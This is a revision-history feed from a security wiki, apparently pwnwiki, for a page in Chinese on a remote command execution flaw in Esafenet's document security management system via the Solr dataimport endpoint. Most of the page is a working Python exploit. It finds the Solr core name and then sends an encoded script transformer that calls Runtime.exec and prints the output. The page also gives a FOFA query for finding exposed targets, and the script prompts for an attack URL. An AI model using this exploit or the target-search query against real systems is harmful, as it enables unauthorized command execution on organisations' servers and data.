https://pwnwiki.com/index.php?action=history&feed=atom&title=%E5%84%84%E8%B3%BD%E9%80%9A_%E9%9B%BB%E5%AD%90%E6%96%87%E6%AA%94%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%B5%B1_dataimport_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
億賽通 電子文檔安全管理系統 dataimport 遠程命令執行漏洞 - Revision history
2026-04-16T03:24:22Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=%E5%84%84%E8%B3%BD%E9%80%9A_%E9%9B%BB%E5%AD%90%E6%96%87%E6%AA%94%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%B5%B1_dataimport_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=3900&oldid=prev
Pwnwiki: Created page with "==FOFA== <pre> title="电子文档安全管理系统" </pre> ==漏洞利用== 先獲取 core name 訪問路徑 <pre> /solr/admin/cores </pre> ==POC== <pre> import requests..."
2021-06-03T02:47:21Z
<p>Created page with "==FOFA== <pre> title="电子文档安全管理系统" </pre> ==漏洞利用== 先獲取 core name 訪問路徑 <pre> /solr/admin/cores </pre> ==POC== <pre> import requests..."</p>
<p><b>New page</b></p><div>==FOFA==<br />
<pre><br />
title="电子文档安全管理系统"<br />
</pre><br />
<br />
==漏洞利用==<br />
先獲取 core name<br />
<br />
訪問路徑<br />
<pre><br />
/solr/admin/cores<br />
</pre><br />
<br />
==POC==<br />
<pre><br />
import requests<br />
import sys<br />
import random<br />
import re<br />
import base64<br />
import time<br />
from requests.packages.urllib3.exceptions import InsecureRequestWarning<br />
<br />
def title():<br />
print('+------------------------------------------')<br />
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')<br />
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')<br />
print('+ \033[34m公众号 : PeiQi文库 \033[0m')<br />
print('+ \033[34mTitle : 亿赛通 电子文档安全管理系统 dataimport 远程命令执行漏洞 \033[0m')<br />
print('+ \033[36m使用格式: python3 poc.py \033[0m')<br />
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')<br />
print('+------------------------------------------')<br />
<br />
def POC_1(target_url):<br />
vuln_url = target_url + "/solr/admin/cores"<br />
headers = {<br />
"Content-Type": "application/x-www-form-urlencoded",<br />
}<br />
try:<br />
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br />
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)<br />
print("\033[36m[o] 正在请求 {}/solr/admin/cores.... \033[0m".format(target_url))<br />
if 'responseHeader' in response.text and response.status_code == 200:<br />
result = re.search(<br />
r'<str name="name">([\s\S]*?)</str><str name="instanceDir">', response.text, re.I)<br />
core_name = result.group(1)<br />
print("\033[36m[o] 获取core_name : {} \033[0m".format(core_name))<br />
POC_2(target_url, core_name)<br />
else:<br />
print("\033[31m[x] 请求失败 \033[0m")<br />
sys.exit(0)<br />
<br />
except Exception as e:<br />
print("\033[31m[x] 请求失败 \033[0m", e)<br />
<br />
def POC_2(target_url, core_name):<br />
cmd = "whoami"<br />
vuln_url = target_url + "/solr/{}/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22{}%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20".format(core_name, cmd)<br />
files = {<br />
'stream.body': '''<?xml version="1.0" encoding="UTF-8"?><br />
<RDF><br />
<item/><br />
</RDF>'''<br />
}<br />
try:<br />
print("\033[36m[o] 正在执行 whoami ... \033[0m".format(target_url))<br />
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br />
response = requests.post(url=vuln_url, files=files, verify=False, timeout=5)<br />
cmd_response = re.search(<br />
r'documents"><lst><arr name="title"><str>([\s\S]*?)</str></arr></lst>', response.text, re.I)<br />
cmd_response = cmd_response.group(1)<br />
if response.status_code == 200 and cmd_response:<br />
print("\033[36m[o] 命令响应为:\n{} \033[0m".format(cmd_response))<br />
<br />
except Exception as e:<br />
print("\033[31m[x] 请求失败 \033[0m")<br />
<br />
<br />
<br />
if __name__ == '__main__':<br />
title()<br />
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))<br />
POC_1(target_url)<br />
<br />
</pre><br />
<br />
==參考==<br />
https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E4%BA%BF%E8%B5%9B%E9%80%9A/%E4%BA%BF%E8%B5%9B%E9%80%9A%20%E7%94%B5%E5%AD%90%E6%96%87%E6%A1%A3%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20dataimport%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md</div>
Pwnwiki